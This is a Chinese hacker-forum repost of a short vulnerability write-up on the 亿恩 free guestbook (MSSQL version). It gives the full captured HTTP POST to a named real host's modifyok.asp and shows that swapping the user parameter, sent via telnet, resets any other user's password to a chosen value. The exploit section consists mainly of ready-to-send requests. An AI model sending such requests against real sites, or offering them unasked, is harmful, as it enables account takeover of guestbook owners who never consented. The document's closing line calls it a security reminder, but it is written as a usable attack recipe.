最大最专业黑客组织 -- 黑客联盟 -- Hacker Union For China -- www.ChinaHacker.Com -- 黑色矩防火墙 -- 专业防御DDOS攻击

联盟首页 技术文章 软件下载 DDOS防御 核心申请 分站申请 邮局系统 技术咨询 区域分化 广告合作 代理服务 版本V6.22

-------- Welcome To Hacker Union For China !Thank You For Your Support !--------
================ 维护祖国尊严 爱我中华 强我中华 耀我中华 ================
中国黑客联盟>>网络信息  |   中国黑客联盟>>系统知识  |  
中国黑客联盟>>网络信息>>漏洞入侵>>亿恩免费留言薄MSSQL版存在修改任意用户密码的漏洞

亿恩免费留言薄MSSQL版存在修改任意用户密码的漏洞


比如:
http://enkj.com/gbook/guestbook.asp?user=bingel
这个是我自己申请用来做测试的免费留言簿

我申请完之后进入修改一下密码

用winsock expert 捕获了如下数据

POST http://enkj.com/gbook/modifyok.asp HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword,

application/vnd.ms-powerpoint, application/vnd.ms-excel, */*
Referer: http://enkj.com/gbook/modify.asp?edit=ok
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)
Host: enkj.com
Content-Length: 122
Pragma: no-cache
Cookie: ASPSESSIONIDCQASSDQA=JHCEGLHCBINJDFOLDAHMKMNG

user=bingel&pass=123456789&zhanzhang=bingel&kind=1&email=binghen@hotmail.com&web=fuck&url=http%3A%2F%2Fsafdafda.com&intro=

这上面一个是关键的东东.

有了这个东东你就可以修改任意用户的密码了

比如你要修改一个用户名为lin的用户的留言簿的密码.只要

telnet enkj.com 80

然后发送post如下数据就可以了.

POST http://enkj.com/gbook/modifyok.asp HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword,

application/vnd.ms-powerpoint, application/vnd.ms-excel, */*
Referer: http://enkj.com/gbook/modify.asp?edit=ok
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)
Host: enkj.com
Content-Length: 122
Pragma: no-cache
Cookie: ASPSESSIONIDCQASSDQA=JHCEGLHCBINJDFOLDAHMKMNG

user=lin&pass=123456789&zhanzhang=bingel&kind=1&email=binghen@hotmail.com&web=fuck&url=http%3A%2F%2Fsafdafda.com&intro=

这样就把用户名为lin的用户的密码修改为123456789

其它的没有必要多说,大家看看就知道是怎么回事了.这个漏洞也只是偶然发现.没有什么技术可言.只是给大家一个提醒.网络上没有绝对的安全.



原作者:冰痕
来 源:xfocus.net
共有9867位读者阅读过此文

□- 本周热门文章
1.“世界头号军事黑客”面临牢狱之灾[59602]
2.谈对局域网用户的限制技术和反限制技巧[26858]
3.常州警方破获一网络刷钻平台诈骗案 涉...[23034]
4.英雄浮水,冰河作者重现江湖.再创力作...[22739]
5.黑客攻击北京邮电大学网站 在首页留下...[21432]
6.每天上网浏览网页也要留心的陷阱[20677]
7.巧用三条命令 使你的电脑网络更安全[18359]

关于我们 | 分站申请 | 成员申请 | 技术论坛 | 站内导航 | 合作伙伴 | 联系我们

Copyrights © 2002 - 2019 www.ChinaHacker.com All Rights Reserved

版权所有   中 国 黑 客 联 盟

(Hacker Union For China V 6.22)

闽ICP备05007859号